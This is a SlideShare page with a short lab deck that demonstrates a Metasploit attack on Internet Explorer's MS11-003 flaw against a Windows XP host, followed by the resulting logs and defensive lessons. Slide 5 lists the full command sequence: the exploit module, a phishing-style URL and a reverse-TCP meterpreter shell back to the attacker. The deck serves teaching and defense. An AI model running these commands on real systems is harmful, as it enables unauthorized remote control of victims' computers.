SlideShare a Scribd company logo

Metasploit Exploitation Scenarios -EN : Scenario 1

Download as KEY, PDF
Eric Romang
Eric Romang

First part of the Metasploit Exploitation Scenarios serie

Technology
1 of 7
Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 

Recommended

Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Metasploit Exploitation Scenarios -EN : Scenario 2
Metasploit Exploitation Scenarios -EN : Scenario 2Eric Romang
 
Optix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanOptix Pro Bo2 K Trojan
Optix Pro Bo2 K TrojanShinra
 
Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Cybersecurity Essentials - Part 1
Cybersecurity Essentials - Part 1Shobhit Sharma
 
Windows xp compromise and remedies
Windows xp compromise and remediesWindows xp compromise and remedies
Windows xp compromise and remediesBikrant Gautam
 
Leeme
LeemeLeeme
LeemeJohan Vasco
 
Disabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDisabling Ports 135 and 445 to protect the Road Warrior
Disabling Ports 135 and 445 to protect the Road WarriorDavid Sweigert
 
Detecting hardware keyloggers
Detecting hardware keyloggersDetecting hardware keyloggers
Detecting hardware keyloggersmihailowitsch
 
Backdoor
BackdoorBackdoor
Backdoorphanleson
 
Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Computer securety
Computer securetyComputer securety
Computer securetyrushil ahmed
 
Cracking wep
Cracking wepCracking wep
Cracking wepPedro Guillén Núñez
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
Conficker
ConfickerConficker
ConfickerBobmathews
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC NetworkingMarian Marinov
 
metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723Iftach Ian Amit
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Final Engagement
Final EngagementFinal Engagement
Final EngagementJefferson Green
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Linux router
Linux routerLinux router
Linux routerMiguel E Arellano Quezada
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 

More Related Content

What's hot

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionageMuts Byte
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key loggerTamim1980
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusjesicasruma
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSecurity Scope
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec
 

What's hot (9)

Embedded government espionage
Embedded government espionageEmbedded government espionage
Embedded government espionage
 
Computer securety
Computer securetyComputer securety
Computer securety
 
Cracking wep
Cracking wepCracking wep
Cracking wep
 
Hardware key logger
Hardware key loggerHardware key logger
Hardware key logger
 
Remove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virusRemove search.portsayd.com redirect virus
Remove search.portsayd.com redirect virus
 
Conficker
ConfickerConficker
Conficker
 
SSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course SyllabusSSMF (Security Scope Metasploit Framework) - Course Syllabus
SSMF (Security Scope Metasploit Framework) - Course Syllabus
 
Symantec Freak Vulnerability Infographic
Symantec Freak Vulnerability InfographicSymantec Freak Vulnerability Infographic
Symantec Freak Vulnerability Infographic
 
Secure LXC Networking
Secure LXC NetworkingSecure LXC Networking
Secure LXC Networking
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1

metaploit framework
metaploit frameworkmetaploit framework
metaploit frameworkLe Quyen
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitIOSR Journals
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRootedCON
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareTyler Borosavage
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicJulia Yu-Chin Cheng
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web WorkshopDennis Maldonado
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackAjinkya Nikam
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresNioLemuelLazatinConc
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdfmeejuhaszjasmynspe52
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsManuel Santander
 
Taming botnets
Taming botnetsTaming botnets
Taming botnetsf00d
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisPositive Hack Days
 

Similar to Metasploit Exploitation Scenarios -EN : Scenario 1 (20)

metaploit framework
metaploit frameworkmetaploit framework
metaploit framework
 
Compromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploitCompromising windows 8 with metasploit’s exploit
Compromising windows 8 with metasploit’s exploit
 
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acinRooted2020 emotet is-dead_long_live_emotet_-_victor_acin
Rooted2020 emotet is-dead_long_live_emotet_-_victor_acin
 
Countering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by MalwareCountering Innovative Sandbox Evasion Techniques Used by Malware
Countering Innovative Sandbox Evasion Techniques Used by Malware
 
Stuxnet dc9723
Stuxnet dc9723Stuxnet dc9723
Stuxnet dc9723
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Honeycon2016-honeypot updates for public
Honeycon2016-honeypot updates for publicHoneycon2016-honeypot updates for public
Honeycon2016-honeypot updates for public
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Final Engagement
Final EngagementFinal Engagement
Final Engagement
 
Metasploit for Web Workshop
Metasploit for Web WorkshopMetasploit for Web Workshop
Metasploit for Web Workshop
 
Linux router
Linux routerLinux router
Linux router
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
Stuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attackStuxnet mass weopan of cyber attack
Stuxnet mass weopan of cyber attack
 
Malwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares MalwaresMalwares Malwares Malwares Malwares Malwares
Malwares Malwares Malwares Malwares Malwares
 
1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf1. inside source IP address and port number 172.16.1.2020translat.pdf
1. inside source IP address and port number 172.16.1.2020translat.pdf
 
STUXNET_
STUXNET_STUXNET_
STUXNET_
 
Cisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designsCisco Malware: A new risk to consider in perimeter security designs
Cisco Malware: A new risk to consider in perimeter security designs
 
I Heart Stuxnet
I Heart StuxnetI Heart Stuxnet
I Heart Stuxnet
 
Taming botnets
Taming botnetsTaming botnets
Taming botnets
 
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic AnalysisLife Cycle And Detection Of Bot Infections Through Network Traffic Analysis
Life Cycle And Detection Of Bot Infections Through Network Traffic Analysis
 

Recently uploaded

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...HostedbyConfluent
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhisoniya singh
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 

Recently uploaded (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 ✓Call Girls In Kalyan ( Mumbai ) secure service
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
 
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | DelhiFULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY 🔝 8264348440 🔝 Call Girls in Diplomatic Enclave | Delhi
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path Mount
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 

Metasploit Exploitation Scenarios -EN : Scenario 1

  • 1. Metasploit Scenarios Scenario 1 Http:://eromang.zataz.com - Http://twitter.com/eromang
  • 2. Scenario 1 : Topology Target Firewall Attacker Gateway 192.168.111.0/24 192.168.178.0/24 Target : - Windows XP SP3 - User has an admin profile - IP : 192.168.111.129 - Default gateway : 192.168.111.128 - No anti-virus / Local Windows Firewall activated - Vulnerable to MS11-03 Firewall Gateway : - Eth0 : 192.168.111.128 (internal interface) - Eth1 : 192.168.178.59 (external interface) Attacker : - IP : 192.168.178.21
  • 3. Scenario 1 : Firewall rules • Firewall administration by SSH only from internal network • Internal network is allowed to request «Any» protocols to external network
  • 4. Scenario 1 : Story-Board ✤ This network topology is corresponding to most of broadband ADSL Internet connexions for home users, and SMB. ✤ Attacker send a Twitter message to the target. The message contain a malicious URL (could be shortened) in order to exploit Internet Explorer MS11-03 vulnerability. ✤ The target click on the provided link and MS11-03 is exploited. ✤ After the exploitation a reverse_tcp meterpreter payload, on port 4444/TCP, is launched. ✤ No further post-exploitations
  • 5. Scenario 1 : Metasploit commands use exploit/windows/browser/ms11_003_ie_css_import set SRVHOST 192.168.178.21 set SRVPORT 80 set URIPATH /readme.html set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 192.168.178.21 exploit sysinfo ipconfig route getuid
  • 6. Scenario 1 : Evidences Internet Explorer process is created : A new process has been created: New Process ID: 3200 Image File Name: C:Program FilesInternet Exploreriexplore.exe Creator Process ID: 2224 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Internet Explorer process create a new «notepad.exe» process : A new process has been created: New Process ID: 3972 Image File Name: C:WINDOWSsystem32notepad.exe Creator Process ID: 3200 User Name: romang Domain: ERIC-FD2123B3C5 Logon ID: (0x0,0x62764) Logs on the Firewall Gateway Feb 21 15:31:52 fw1 kernel: [18410.843231] RULE 5 -- ACCEPT IN=eth0 OUT=eth1 SRC=192.168.111.129 DST=192.168.178.21 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=2845 DF PROTO=TCP SPT=1078 DPT=4444 WINDOW=64240 RES=0x00 SYN URGP=0
  • 7. Scenario 1 : Leasons Learned •Update your OS and applications ! •Don’t run applications with administrator privileges ! •Never click on unknown links, specialy shortened URL’s, from unknown sources ! •Install an antivirus and don’t trust him :) •Don’t trust your Firewalls (Local or remote) ! •Don’t allow «Any» outbound protocols connexions from your internal network to untrusted networks ! Limit your outbound connexions to your real needs. 7

Editor's Notes

  1. \n
  2. \n
  3. \n
  4. \n
  5. \n
  6. \n
  7. \n